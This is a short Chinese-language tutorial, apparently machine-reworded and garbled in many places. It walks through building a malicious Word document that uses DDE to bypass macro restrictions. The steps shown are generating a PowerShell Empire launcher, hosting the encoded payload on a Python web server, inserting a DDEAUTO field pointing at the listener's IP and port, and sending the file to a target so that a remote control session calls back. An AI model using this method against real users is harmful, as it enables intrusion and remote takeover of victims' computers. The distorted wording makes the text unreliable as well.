近期, 有安然人員創造了一種DynamicData Exchange (DDE)和談繞過MSWord和MSExcel宏限定, 不需使用MSWord和MSExcel裂痕, 就能實如今Office文檔中實行惡意呼籲目的。 在這篇文章中, 我將展現若何把持基於Empire的PowerShell來對Word文檔停止“假裝”鞭撻打擊,
建樹Empire Listener
建樹一個Empire Listener監聽執行緒, 可點此檢察Empire的使用聲名。
當監聽執行緒啟動運轉之後, 運轉以下呼籲, 生成將要在方針受害機械上實行的PowerShell代碼:
launcher powershell C2
複製powershell -noP -sta -w 1 -enc之後的轉碼劇本並另存為一個檔, 然後把它安排於某個鞭撻打擊必要用到的Web辦事器中, 用於受害主機稍後的哀求下載。 該Web辦事器可所以Apache之類的, 但在這裡, 我用Python SimpleHTTPServer模組來快速啟動一個Web辦事, 它會主動託管你啟動呼籲目錄內的檔, 固然最好可以建樹一個檔目錄, 然後經由過程終端cd到其中停止檔生成(我這裡是evil)和啟動Web辦事。 (Python的Web辦事默認監聽埠為8000)
python -m SimpleHTTPServer
改裝Word文檔
建樹一個可以把持DDE鞭撻打擊的Word文檔:生成一個Word文檔,
然後不才面這選擇= (Formula), 點擊OK:
在生成的內容上面, 右鍵點擊切換功能變數代碼(Toggle Field Codes):
之後, 在其中插入以下DDEAUTO代碼, 但務必監聽端的IP和埠精確:
如今就可以保留該文檔, 預備把它發送給方針受害者了。
鞭撻打擊測試
一旦受害者把所有錯誤消息都點擊了Yes之後, 在我們的監聽端就會反彈回一個Empire的節制毗連, 對受害者體系形成長途節制。